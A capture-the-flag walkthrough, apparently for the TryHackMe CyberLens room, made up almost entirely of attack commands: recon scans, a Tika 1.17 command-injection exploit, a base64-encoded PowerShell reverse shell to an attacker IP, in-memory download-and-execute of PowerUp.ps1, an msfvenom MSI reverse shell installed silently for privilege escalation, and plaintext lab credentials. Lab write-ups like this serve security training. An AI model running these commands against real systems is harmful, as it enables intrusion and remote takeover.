Room Link: https://tryhackme.com/r/room/cyberlensp6
Kali
Copy echo $VICTIM cyberlens.thm >> /etc/hosts
cat /etc/hosts
Scans
Initial scan
Kali
Copy nmap -A cyberlens.thm
Longer scan
Kali
Copy nmap -sV -sT -O -p 1-65535 cyberlens.thm
TCP/80 - HTTP
Find Pages
Kali
Copy ffuf -u http://cyberlens.thm/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt
TCP/61777 - HTTP
Find Pages
Kali
Copy ffuf -u http://cyberlens.thm:61777/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt
The other web server is running Tika 1.17 which has a command injection exploit.
Initial Shell
Kali
Copy searchsploit tika
searchsploit tika -m windows/remote/46540.py
Kali #1
Copy python2 -m SimpleHTTPServer 82
Kali #2
Copy python3 46540.py cyberlens.thm 61777 "curl http://10.10.178.238:82"
I tried to download multiple reverse shells but the problem seemed to be I couldn't save it anywhere so I did a base64 encoded PowerShell reverse shell.
Kali #1
Kali #2
Copy python3 46540.py cyberlens.thm 61777 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA3ADgALgAyADMAOAAiACwAMQAzADMANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
Web Access
Victim
Copy cd C:\Users\CyberLens\Documents\Management
type CyberLens-Management.txt
Kali
Copy remmina
Username: CyberLens
Password: HackSmarter123
Privlege Escalation
Load PowerUp.ps1 into memory.
Kali
Copy wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 82
Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded
PowerUp.ps1
Victim(powershell)
Copy powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:82/PowerUp.ps1')
Kali
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=1338 -f msi > shell.msi
Kali
Victim(powershell)
Copy cd C:\temp\shell.msi
iwr -uri "http://$KALI:82/shell.msi" -o shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi